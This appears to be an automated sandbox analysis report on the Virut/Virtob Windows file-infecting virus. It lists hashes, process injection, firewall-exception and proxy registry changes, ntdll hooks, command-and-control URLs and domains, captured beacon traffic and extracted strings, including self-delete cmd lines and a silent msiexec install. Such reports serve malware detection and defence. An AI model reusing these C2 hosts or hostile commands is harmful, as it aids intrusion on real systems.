Win32.Virtob.Gen.12_07f465a62b
Win32.Virtob.Gen.12 (BitDefender), Virus:Win32/Virut.BO (Microsoft), Virus.Win32.Virut.ce (Kaspersky), Virus.Win32.Virut.ce.5 (v) (VIPRE), Win32.Virut.56 (DrWeb), Win32.Virtob.Gen.12 (B) (Emsisoft), W32/Virut.n.gen (McAfee), W32.Virut.CF (Symantec), Virus.Win32.Virut (Ikarus), Win32.Virtob.Gen.12 (FSecure), Win32:Virtu-A (AVG), Win32:Virtu-A (Avast), PE_VIRUX.O (TrendMicro), Win32.Virtob.Gen.12 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 07f465a62b176b2c8399709ae964a0b6
SHA1: 88a1097b2a7507cb96fe4db5b52e6a9eb3257f36
SHA256: 12f0cd92b7a0c201647b4e2bfc38321d4f92fc15d07973353bc6aed345e4b1cd
SSDeep:
Size: 122368 bytes
File type: broken
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-04-28 14:35:22
Analyzed on: Windows7 SP1 32-bit
Summary:
Virus. A program that recursively replicates a possibly evolved copy of itself.
Payload
No specific payload has been found.
Process activity
The Virus creates the following process(es):
%original file name%.exe:1760
VRT26C2.tmp:1828
VRT28F.tmp:1856
The Virus injects its code into the following process(es):
INJ2AF6.tmp:3644
INJ6F2.tmp:2556
Explorer.EXE:2024
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process VRT26C2.tmp:1828 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
C:\Windows\Temp\INJ2AF6.tmp (1 bytes)
The process VRT28F.tmp:1856 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
C:\Windows\Temp\INJ6F2.tmp (919 bytes)
Registry activity
The process INJ2AF6.tmp:3644 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:1760 makes changes in the system registry.
The Virus deletes the following value(s) in system registry:
The Virus disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"TpmInit"
The process VRT26C2.tmp:1828 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ2AF6.tmp" = "C:\Windows\TEMP\INJ2AF6.tmp:*:enabled:@shell32.dll,-1"
The process VRT28F.tmp:1856 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ6F2.tmp" = "C:\Windows\TEMP\INJ6F2.tmp:*:enabled:@shell32.dll,-1"
Dropped PE files
MD5 | File path |
---|---|
f96443833ab6d33149472cf9cde73650 | c:\Windows\Temp\INJ2AF6.tmp |
9c78f7b678862ccfcc4a59a1a595a1b5 | c:\Windows\Temp\INJ6F2.tmp |
e5446c6dbc75682ce72a2cf2967d3851 | c:\Windows\Temp\VRT26C2.tmp |
66709f29c15dc13741d0515175c48bd5 | c:\Windows\Temp\VRT28F.tmp |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Virus installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: TpmInit.EXE
Internal Name: TpmInit.EXE
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: TPM Initialization Wizard
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 60696 | 60928 | 4.34138 | 5aaa1addcc820bbe549fc170243a898f |
.data | 65536 | 1092 | 512 | 1.3003 | adb0eaa6ccdefb7bfc124e72901195c2 |
.rsrc | 69632 | 28560 | 28672 | 3.28165 | f0dc51bf0ad5c24abe4287f436605016 |
.reloc | 98304 | 32256 | 31232 | 5.45968 | 9fa38efa7dcc90279d8c079a5dfa1a65 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1070905474&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=240888132&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 | |
hxxp://ec2-35-176-87-12.eu-west-2.compute.amazonaws.com/request/autok?user=youllupuki&ver=9&key=80784fb5bbf8032b8530b4c355ba180f | |
hxxp://ec2-35-176-87-12.eu-west-2.compute.amazonaws.com/request/conditions?user=youllupuki&ver=9&key=c3cec4a6f3958b958a6a270f8bbb7a49&token=c320afa79cbba676cc464a8b4ae82b70 | |
cf.ketor.ru | |
arnash.com | |
n2.rolmi.ru | |
uy.ziten.ru | |
towjeb.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Windows executable sent when remote host claims to send an image 2
ET POLICY Suspicious Windows Executable WriteProcessMemory
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN Backdoor User-Agent (InstallCapital)
Traffic
POST /request/autok?user=youllupuki&ver=9&key=80784fb5bbf8032b8530b4c355ba180f HTTP/1.1
Accept: */*
User-Agent: Christmas Mystery 5.5.4
Content-Type: application/x-www-form-urlencoded
Host: ec2-35-176-87-12.eu-west-2.compute.amazonaws.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 152
Connection: keep-alive
Server: nginx
Date: Sat, 17 Jun 2017 00:19:15 GMT
X-Powered-By: PHP/5.6.30-1~dotdeb 7.1
POST /request/conditions?user=youllupuki&ver=9&key=c3cec4a6f3958b958a6a270f8bbb7a49&token=c320afa79cbba676cc464a8b4ae82b70 HTTP/1.1
Accept: */*
User-Agent: Christmas Mystery 5.5.4
Content-Type: application/x-www-form-urlencoded
Host: ec2-35-176-87-12.eu-west-2.compute.amazonaws.com
Content-Length: 1063
Cache-Control: no-cache
data=MrtGiEYg3vvPtldMSthNYMAZ6uSBUBJsE3ze+N2zUIsZTelrEC39W5jS5e4Qf+d6BudcE+j+6xd2zruUbefj15BgPtjtblGpN3jZfRSgfNz0t/Ni9G1UaylU4tCragScxMrTcwrm0oMk4QUoCCOIZvDDfq+9Rc0/9IJY3NXdKHC1w+ID78cjsCOozLUtgyJo63TNa+KzFtZm9xRj7Ff/xamKwLibIp2ttg4Y3Ou+yGxMnnLj+82rUd/vqQi2NrsdV3hI/nHk7c+VwuVGrJJu7QEboRR/aSIrI78nikGKSV1X0gkF1bZ995hG3dr535KUBz7+3nsctaweuEaSyCtP41j/4GluIX7RaDsXTujmboEV1w2ThM8b94e6joE+GpXHemWH5LYA78fUkphEBQQ5QU1z4Gnk3yciPG7r0SH3SMBDF8Rv2dL9qTLpJie47qtuxfedRCXlfpoOxcg4tmRDF8xWaj+SULMxjlkok6oMJD5WimHuhsif+biULlTmLXxr9YPX9Pa4E5MHW1k0GuwkgZSXk53bjF/GnHv1nzShBVm6xGS5Py/YUC8MSLpp0/LGq0FEkDdpTTtuw+N49Gbroca96FFSxZgx2U5XzoRBrPHyuYs6DXuwmw6LG2YAcuG6Sww4xmB5k4hlObW0jj12kmMeOIxgu/bzXg64Us2+vHz06ZFasEbANVKQYl36Wh1b2RL5rU5a3uPNbmUIgU08kGu/H02HUBnQCD4yMBQARpD4J3/TVo9PcxO6zKlK1DbcmLT7WKgxJYQ6CXmSXeiViRafbnp6nrBi+JNaT4efpTPqvP+F5FzsEQGhRsb/mWrUPVhIFMvmE8aaHv5xmUfM5ly6Y+BSu0dtcGOCCdqYn/3F18G9BR6HV7FujLNWehHVbrS9YNyLGjdXhYXgN+rHEQGhRsb/mWrUPVhIFMvmE8YQSg7GPX/sJYU9YrxsIbePalCUIlA2F+Ec1BgmC5ZoORdSVF8q9bcGzPm40nAnPIraKf3Rtbek5g==
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 440
Connection: keep-alive
Server: nginx
Date: Sat, 17 Jun 2017 00:19:15 GMT
X-Powered-By: PHP/5.6.30-1~dotdeb 7.1
GET hXXp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1070905474&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=240888132&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 0
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sat, 17 Jun 2017 00:18:28 GMT
X-Cache: Miss from cloudfront
Via: 1.1 00f70d80ca42cb07bb0c7279917c43a5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: h6vfjfknNqQwti7ZSjYqoYSXh9bU3s42yS7AjsKmh9HwAg5Ju3DKAg==
The Virus connects to the servers at the following location(s):
.text
`.rdata
@.data
.gfids
@.tls
.rsrc
inappropriate io control operation
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
address family not supported
broken pipe
function not supported
InitOnceExecuteOnce
operator
operator ""
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.gfids$x
.gfids$y
.tls$
.tls$ZZZ
.rsrc$01
.rsrc$02
KERNEL32.dll
SHELL32.dll
GetCPInfo
GetProcessHeap
.?AU_Crt_new_delete@std@@
.?AU?$parser_binder@U?$lexeme_directive@U?$plus@U?$action@U?$difference@U?$char_class@U?$char_code@Uchar_@tag@spirit@boost@@Uascii@char_encoding@34@@tag@spirit@boost@@@qi@spirit@boost@@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@234@@qi@spirit@boost@@U?$actor@U?$basic_expr@Uplus_assign@tag@tagns_@proto@boost@@U?$list2@U?$actor@U?$attribute@$0A@@spirit@boost@@@phoenix@boost@@U?$actor@U?$argument@$0A@@spirit@boost@@@23@@argsns_@45@$01@exprns_@proto@boost@@@phoenix@4@@qi@spirit@boost@@@qi@spirit@boost@@@qi@spirit@boost@@U?$bool_@$0A@@mpl@4@@detail@qi@spirit@boost@@
.?AU?$parser_binder@U?$sequence@U?$cons@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@qi@spirit@boost@@U?$cons@U?$not_predicate@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@qi@spirit@boost@@@qi@spirit@boost@@U?$cons@U?$lexeme_directive@U?$plus@U?$action@U?$difference@U?$char_class@U?$char_code@Uchar_@tag@spirit@boost@@Uascii@char_encoding@34@@tag@spirit@boost@@@qi@spirit@boost@@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@234@@qi@spirit@boost@@U?$actor@U?$basic_expr@Uplus_assign@tag@tagns_@proto@boost@@U?$list2@U?$actor@U?$attribute@$0A@@spirit@boost@@@phoenix@boost@@U?$actor@U?$argument@$0A@@spirit@boost@@@23@@argsns_@45@$01@exprns_@proto@boost@@@phoenix@4@@qi@spirit@boost@@@qi@spirit@boost@@@qi@spirit@boost@@U?$cons@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@qi@spirit@boost@@Unil_@fusion@4@@fusion@4@@fusion@4@@fusion@4@@fusion@boost@@@qi@spirit@boost@@U?$bool_@$0A@@mpl@4@@detail@qi@spirit@boost@@
C:\Windows\TEMP\INJ6F2.tmp
@.reloc
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
GetProcessWindowStation
openUrl
appCmd
appImageUrl
appSetupUrl
appTYUrl
HTTP/1.1
GET hXXp://
POST hXXp://
hXXps://
hXXp://
Fx
id[]=%d
application/x-www-form-urlencoded
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
HTTP\shell\open\command
RegOpenKeyTransactedW
CreateDialogIndirectParamW
USER32.dll
CryptImportKey
CryptSetKeyParam
CryptDestroyKey
RegOpenKeyExW
RegCloseKey
RegEnumKeyW
RegOpenKeyExA
GetWindowsAccountDomainSid
ADVAPI32.dll
COMCTL32.dll
ole32.dll
WS2_32.dll
SHFileOperationW
ShellExecuteW
ShellExecuteExW
SHLWAPI.dll
OLEAUT32.dll
GDI32.dll
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSetTimeouts
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpCloseHandle
WINHTTP.dll
VERSION.dll
.?AVHttpRequestContent@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
name='Microsoft.Windows.Common-Controls' version='6.0.0.0'
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />
kernel32.dll
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
portuguese-brazilian
1.0.0.1
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
%systemroot%\system32\msiexec.exe
"%s" /i "%s" /quiet %s
"%s" ,%s %s
B%s\%s
/Cookie: %s
.runas
%d.%d.%d.%d
diexplore.exe
firefox.exe
chrome.exe
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
@Advapi32.dll
{8856F961-340A-11D0-A96B-00C04FD705A2}
INJ6F2.tmp_2556_rwx_002C0000_0005F000:
.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
openUrl
appCmd
appImageUrl
appSetupUrl
appTYUrl
HTTP/1.1
GET hXXp://
POST hXXp://
hXXps://
hXXp://
Fx
id[]=%d
application/x-www-form-urlencoded
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
HTTP\shell\open\command
RegOpenKeyTransactedW
GetProcessHeap
KERNEL32.dll
CreateDialogIndirectParamW
USER32.dll
CryptImportKey
CryptSetKeyParam
CryptDestroyKey
RegOpenKeyExW
RegCloseKey
RegEnumKeyW
RegOpenKeyExA
GetWindowsAccountDomainSid
ADVAPI32.dll
COMCTL32.dll
ole32.dll
WS2_32.dll
SHFileOperationW
ShellExecuteW
ShellExecuteExW
SHELL32.dll
SHLWAPI.dll
OLEAUT32.dll
GDI32.dll
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSetTimeouts
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpCloseHandle
WINHTTP.dll
VERSION.dll
GetCPInfo
.?AVHttpRequestContent@@
C:\Windows\TEMP\INJ6F2.tmp
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
combase.dll
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
%systemroot%\system32\msiexec.exe
"%s" /i "%s" /quiet %s
"%s" ,%s %s
.%s\%s
/Cookie: %s
.runas
%d.%d.%d.%d
diexplore.exe
firefox.exe
chrome.exe
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
,Advapi32.dll
{8856F961-340A-11D0-A96B-00C04FD705A2}
INJ6F2.tmp_2556_rwx_00CC1000_0005C000:
(strings in this region duplicate those listed under INJ6F2.tmp_2556_rwx_002C0000_0005F000 above)
INJ6F2.tmp_2556_rwx_00D52000_00001000:
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
name='Microsoft.Windows.Common-Controls' version='6.0.0.0'
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />
INJ2AF6.tmp_3644:
.text
`.rdata
@.data
.rsrc
@.reloc
Kernel32.dll
CCmdTarget
Comdlg32.dll
Comctl32.dll
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CNotSupportedException
TaskDialogIndirect
RegDeleteKeyExW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
\*/:<>?|"
ec2-35-176-87-12.eu-west-2.compute.amazonaws.com
386973894
()$^.* ?[]|\-{},:=!
AmigoDistrib.exe
%LOCALAPPDATA%\Amigo\Application\amigo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
URL =
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
aswhookx.dll
Line %d, Column %d
Bad URL.
Cannot get file size, bad URL.
Request cannot be completed on current url.
Unable to get HTTP status:
ReportStart request failed. Bad data received: "
ReportFinish request failed. Bad data received: "
ReportComponent request failed. Bad data received: "
ReportDefaultComponent failed. Bad data received: "
ReportClose request failed. Bad data received: "
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
HKEY_CLASSES_ROOT\http\shell\open\command
opera
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCanonicalizeUrlW
WININET.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
EnumWindows
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
CreateDialogIndirectParamW
USER32.dll
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
OLEACC.dll
.?AVCCmdUI@@
.PAVCException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCMemoryException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.?AVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCFileException@@
.?AVCCmdTarget@@
.?AVHttpDownloaderException@@
.?AVHttpDownloader@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
"All files (*.*)" = "
(*.*)"
"All files (*.*)" = "All files (*.*)"
HKernel32.dll
HComdlg32.dll
Ikernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
accKeyboardShortcut
commctrl_DragListMsg
Afx:%p:%x
Afx:%p:%x:%p:%p:%p
user32.dll
hhctrl.ocx
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
comctl32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Dmfcm120u.dll
dshell32.dll
ED2D1.dll
DWrite.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
lXXxXXXXXXXX
combase.dll
Fmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"
cmd.exe /C timeout 3 > Nul & Del "%s"
hXXp://megadowl.com/terms-ru.html
All files (*.*)
r.ico
. Component url:
chrome
firefox
s.lnk
\amigo.exe
application/exe
application/x-dosexec
WINDOWS
\\.\PhysicalDrive%d
Advapi32.dll
x-x-x-x-x-x
oIphlpapi.dll
hXXp://
explorer.exe
_Label_Url_
Wininet.dll
ntdll.dll
C:\Windows\TEMP\INJ2AF6.tmp
Citizen_Cope.mp3
1340951093
C:\Download
5.5.4
cubeload.ru
request/report?
&key=
User-Agent: /Content-Type: application/x-www-form-urlencoded
\\.\PhysicalDrive
ÞSKTOP%
%DOWNLAODS%
windows
downloads!hXXp://megadowl.com/terms-ru.html
HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName
file_url
file_url_domain
send_report_type
reg_key
ReportStart failed
ReportClose failed
ReportFinish failed
ReportComponent failed
by url:
Failed executing file:
report_delay
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version
. File URL:
HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
